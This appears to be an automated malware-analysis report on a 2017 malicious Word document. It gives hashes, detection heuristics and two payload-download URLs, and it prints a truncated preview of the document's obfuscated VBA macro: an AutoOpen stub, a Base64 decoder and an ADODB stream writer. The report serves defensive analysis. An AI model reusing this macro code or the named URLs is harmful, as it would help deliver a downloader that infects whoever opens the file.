Office (OLE) malware analysis — malicious · 733ee48fefe8b9d8

MALICIOUS

Office (OLE)

161.5 KB Created: 2017-05-04 22:34:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 2f2346530bda054d350d7810ba84a48d SHA-1: 693c101b4c3d93683d1521e39786e4404c440c9b SHA-256: 733ee48fefe8b9d89a0a0ee956dde7b3272a005120f0245e85587dac3c53f0f4

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The macro utilizes a Base64-decoded Shell command stager to download a payload from the URLs 'monarchiste.com/hj7jq-rw947-wcgqm/' and 'http://faciusa.com/zap1fts-a367-'. The presence of the AutoOpen macro and Shell() call indicates an attempt to execute arbitrary code upon opening the document.

Heuristics 9

ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://faciusa.com/zap1fts-a367- Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16275 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16275 bytes
SHA-256: `15a0e1f60b2bf0df929952b458ad9caa402eb689c84b1938313e325ea74ef0c3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim BpqVcmv As Byte BpqVcmv = 66 Dim LmpPvRJ As Integer LmpPvRJ = Sgn(-29983) auMRvdU End Sub Attribute VB_Name = "Module2" Public Function TgsoLNn6(ByVal czB0d) Dim gp8cn17FQ As Single gp8cn17FQ = Val(21658.693522083) Dim qsfX5kW27 As Byte qsfX5kW27 = 181 Dim hEAth3FfZ As Integer hEAth3FfZ = Sgn(-20058) Dim ke2H7bl As Byte ke2H7bl = 208 Dim jIL0K3d5b As Byte jIL0K3d5b = 185 Dim tZiH1ltuR Dim Pc4zem6x Dim jSVlb As Long jSVlb = 0 Dim lM6kxu1 As Double lM6kxu1 = Val(27104.520179464) Dim wxsPaLm wxsPaLm = Len(nNSmAlZX) Dim KOzxbEK3P As Double KOzxbEK3P = Val(26711.64802029) Dim NLoKUxH NLoKUxH = Val("k") Dim Lzp6tn2 As Double Lzp6tn2 = Sgn(1290.9306694619) Dim vzV0X2C4 As Single vzV0X2C4 = Sgn(32900.001636718) Dim CAopY8Q As String CAopY8Q = Val(QdTQc8) Set tZiH1ltuR = CreateObject(mtNsyfeFR) Dim QqV2r As Boolean QqV2r = False Dim zu9zw5Kc As Boolean zu9zw5Kc = False Dim kDqaNeiul kDqaNeiul = AscW("Z") Dim MzLrA8 As Byte MzLrA8 = 37 Set Pc4zem6x = tZiH1ltuR.CreateElement(QYsqF) Dim mF9ST As Long mF9ST = -378508762 Dim WRrOhNxW WRrOhNxW = Len(qK1YTP6) Dim NY54M0Jj As Double NY54M0Jj = Sgn(34419.575140102) Dim dSQyF As Integer dSQyF = Sgn(21721) Dim DFJknmK As Single DFJknmK = Val(26121.377714274) With Pc4zem6x Dim Fthiq2D6 As Boolean Fthiq2D6 = False Dim bEaF4 As String bEaF4 = RTrim(QapXv) Dim QwRH6 As Long QwRH6 = -944345582 Pc4zem6x.DataType = "bin." & QYsqF Dim Ek1BN As Double Ek1BN = Sgn(51812.28946641) Dim kcfj3 As Boolean kcfj3 = False Pc4zem6x.Text = czB0d End With Dim rnRtC As Long rnRtC = Sgn(-1614955276) Dim HpNIe As Double HpNIe = 7839.5898329569 Dim iMLthiR As Integer iMLthiR = Sgn(15758) TgsoLNn6 = flzGVye(Pc4zem6x.nodeTypedValue) Dim TEK7jCuT As Long TEK7jCuT = Sgn(-1628194472) Dim zq9PhrpmS As Long zq9PhrpmS = 0 Dim yfeza As Boolean yfeza = True Dim U2mOBq As Single U2mOBq = 48875.365939221 Set Pc4zem6x = Nothing Set tZiH1ltuR = Nothing End Function Function flzGVye(Binary) Dim uD4xh9e As Single uD4xh9e = Sgn(11995.925908167) Dim WEeAG As Long WEeAG = -1524949194 Const LxNmvXRP = 2 Const mJBRi8b = 1 Dim Aor6WiA0 As Single Aor6WiA0 = 30699.744684207 Dim RmWaMP As String RmWaMP = StrConv(FRAFGXik3, vbProperCase) Dim WS8o2Ycw As Long WS8o2Ycw = Sgn(0) Dim fozjWsmk As Double fozjWsmk = Int(8375.9183946833) Dim LtgXL As Single LtgXL = Sgn(60807.549883137) Dim IIFNM As Integer IIFNM = -25221 Dim AiPmBRn Dim nn6hBF3 As Byte nn6hBF3 = 0 Dim D0LMp6i As Integer D0LMp6i = -11466 Dim hFvKw As Double hFvKw = Sgn(59906.987581003) Dim f1kGj As Byte f1kGj = 12 Dim zdCR5IzZS As Byte zdCR5IzZS = 57 Dim lwHdnVjs As Single lwHdnVjs = Round(64803.648897087) Dim UMnm01Xa As Integer UMnm01Xa = 18963 Set AiPmBRn = CreateObject("adodb.stream") Dim NqNsTKW As Integer NqNsTKW = 29356 Dim Kp34mW As Long Kp34mW = Sgn(-776414280) Dim YfP3qNLT As Byte YfP3qNLT = 138 Dim JXfS5z2O As Long JXfS5z2O = 0 Dim glCSuB As Byte glCSuB = 2 With AiPmBRn Dim uQwrXp As Long uQwrXp = Sgn(0) Dim UO6PHWcs As Byte UO6PHWcs = 74 Dim rAXwWdJp rAXwWdJp = LCase(zpcJf8ji2) Dim IKa3cskv As Byte IKa3cskv = 95 Dim v2i8M As String v2i8M = StrConv(mAeh8, vbProperCase) Dim kB0IEq6G As Long kB0IEq6G = Sgn(0) .Type = mJBRi8b Dim QvEQep As Long QvEQep = Sgn(-1255866560) Dim OAQJjkF As Long OAQJjkF = Sgn(0) Dim Ilu1GFy0i As Byte Ilu1GFy0i = 214 Dim sGrvF1P As Integer sGrvF1P = 27393 Dim IRtIs As Single IRtIs = Round(4252.3901083266) .Open Dim VSRoi As Double VSRoi = 25144.72953493 Dim XP2zFhk As Boolean XP2zFhk = True Dim Qea9lA As Double Qea9lA = Sgn(44154.480723832) .Write Binary Dim igpntqeFJ As Boolean igpntqeFJ = False Dim nk135tFCv As Single nk135tFCv = ... (truncated)

SHA-256: 15a0e1f60b2bf0df929952b458ad9caa402eb689c84b1938313e325ea74ef0c3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim BpqVcmv As Byte
BpqVcmv = 66
Dim LmpPvRJ As Integer
LmpPvRJ = Sgn(-29983)
auMRvdU
End Sub

Attribute VB_Name = "Module2"
Public Function TgsoLNn6(ByVal czB0d)
Dim gp8cn17FQ As Single
gp8cn17FQ = Val(21658.693522083)
Dim qsfX5kW27 As Byte
qsfX5kW27 = 181
Dim hEAth3FfZ As Integer
hEAth3FfZ = Sgn(-20058)
Dim ke2H7bl As Byte
ke2H7bl = 208
Dim jIL0K3d5b As Byte
jIL0K3d5b = 185
Dim tZiH1ltuR
Dim Pc4zem6x

Dim jSVlb As Long
jSVlb = 0
Dim lM6kxu1 As Double
lM6kxu1 = Val(27104.520179464)
Dim wxsPaLm
wxsPaLm = Len(nNSmAlZX)
Dim KOzxbEK3P As Double
KOzxbEK3P = Val(26711.64802029)
Dim NLoKUxH
NLoKUxH = Val("k")
Dim Lzp6tn2 As Double
Lzp6tn2 = Sgn(1290.9306694619)
Dim vzV0X2C4 As Single
vzV0X2C4 = Sgn(32900.001636718)
Dim CAopY8Q As String
CAopY8Q = Val(QdTQc8)
Set tZiH1ltuR = CreateObject(mtNsyfeFR)

Dim QqV2r As Boolean
QqV2r = False
Dim zu9zw5Kc As Boolean
zu9zw5Kc = False
Dim kDqaNeiul
kDqaNeiul = AscW("Z")
Dim MzLrA8 As Byte
MzLrA8 = 37
Set Pc4zem6x = tZiH1ltuR.CreateElement(QYsqF)

Dim mF9ST As Long
mF9ST = -378508762
Dim WRrOhNxW
WRrOhNxW = Len(qK1YTP6)
Dim NY54M0Jj As Double
NY54M0Jj = Sgn(34419.575140102)
Dim dSQyF As Integer
dSQyF = Sgn(21721)
Dim DFJknmK As Single
DFJknmK = Val(26121.377714274)
With Pc4zem6x

Dim Fthiq2D6 As Boolean
Fthiq2D6 = False
Dim bEaF4 As String
bEaF4 = RTrim(QapXv)
Dim QwRH6 As Long
QwRH6 = -944345582
Pc4zem6x.DataType = "bin." & QYsqF
Dim Ek1BN As Double
Ek1BN = Sgn(51812.28946641)
Dim kcfj3 As Boolean
kcfj3 = False
Pc4zem6x.Text = czB0d
End With
Dim rnRtC As Long
rnRtC = Sgn(-1614955276)
Dim HpNIe As Double
HpNIe = 7839.5898329569
Dim iMLthiR As Integer
iMLthiR = Sgn(15758)
TgsoLNn6 = flzGVye(Pc4zem6x.nodeTypedValue)
Dim TEK7jCuT As Long
TEK7jCuT = Sgn(-1628194472)
Dim zq9PhrpmS As Long
zq9PhrpmS = 0
Dim yfeza As Boolean
yfeza = True
Dim U2mOBq As Single
U2mOBq = 48875.365939221
Set Pc4zem6x = Nothing
Set tZiH1ltuR = Nothing
End Function
Function flzGVye(Binary)
Dim uD4xh9e As Single
uD4xh9e = Sgn(11995.925908167)
Dim WEeAG As Long
WEeAG = -1524949194
Const LxNmvXRP = 2
Const mJBRi8b = 1

Dim Aor6WiA0 As Single
Aor6WiA0 = 30699.744684207
Dim RmWaMP As String
RmWaMP = StrConv(FRAFGXik3, vbProperCase)
Dim WS8o2Ycw As Long
WS8o2Ycw = Sgn(0)
Dim fozjWsmk As Double
fozjWsmk = Int(8375.9183946833)
Dim LtgXL As Single
LtgXL = Sgn(60807.549883137)
Dim IIFNM As Integer
IIFNM = -25221
Dim AiPmBRn

Dim nn6hBF3 As Byte
nn6hBF3 = 0
Dim D0LMp6i As Integer
D0LMp6i = -11466
Dim hFvKw As Double
hFvKw = Sgn(59906.987581003)
Dim f1kGj As Byte
f1kGj = 12
Dim zdCR5IzZS As Byte
zdCR5IzZS = 57
Dim lwHdnVjs As Single
lwHdnVjs = Round(64803.648897087)
Dim UMnm01Xa As Integer
UMnm01Xa = 18963
Set AiPmBRn = CreateObject("adodb.stream")

Dim NqNsTKW As Integer
NqNsTKW = 29356
Dim Kp34mW As Long
Kp34mW = Sgn(-776414280)
Dim YfP3qNLT As Byte
YfP3qNLT = 138
Dim JXfS5z2O As Long
JXfS5z2O = 0
Dim glCSuB As Byte
glCSuB = 2
With AiPmBRn
Dim uQwrXp As Long
uQwrXp = Sgn(0)
Dim UO6PHWcs As Byte
UO6PHWcs = 74
Dim rAXwWdJp
rAXwWdJp = LCase(zpcJf8ji2)
Dim IKa3cskv As Byte
IKa3cskv = 95
Dim v2i8M As String
v2i8M = StrConv(mAeh8, vbProperCase)
Dim kB0IEq6G As Long
kB0IEq6G = Sgn(0)
.Type = mJBRi8b
Dim QvEQep As Long
QvEQep = Sgn(-1255866560)
Dim OAQJjkF As Long
OAQJjkF = Sgn(0)
Dim Ilu1GFy0i As Byte
Ilu1GFy0i = 214
Dim sGrvF1P As Integer
sGrvF1P = 27393
Dim IRtIs As Single
IRtIs = Round(4252.3901083266)
.Open

Dim VSRoi As Double
VSRoi = 25144.72953493
Dim XP2zFhk As Boolean
XP2zFhk = True
Dim Qea9lA As Double
Qea9lA = Sgn(44154.480723832)
.Write Binary

Dim igpntqeFJ As Boolean
igpntqeFJ = False
Dim nk135tFCv As Single
nk135tFCv = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.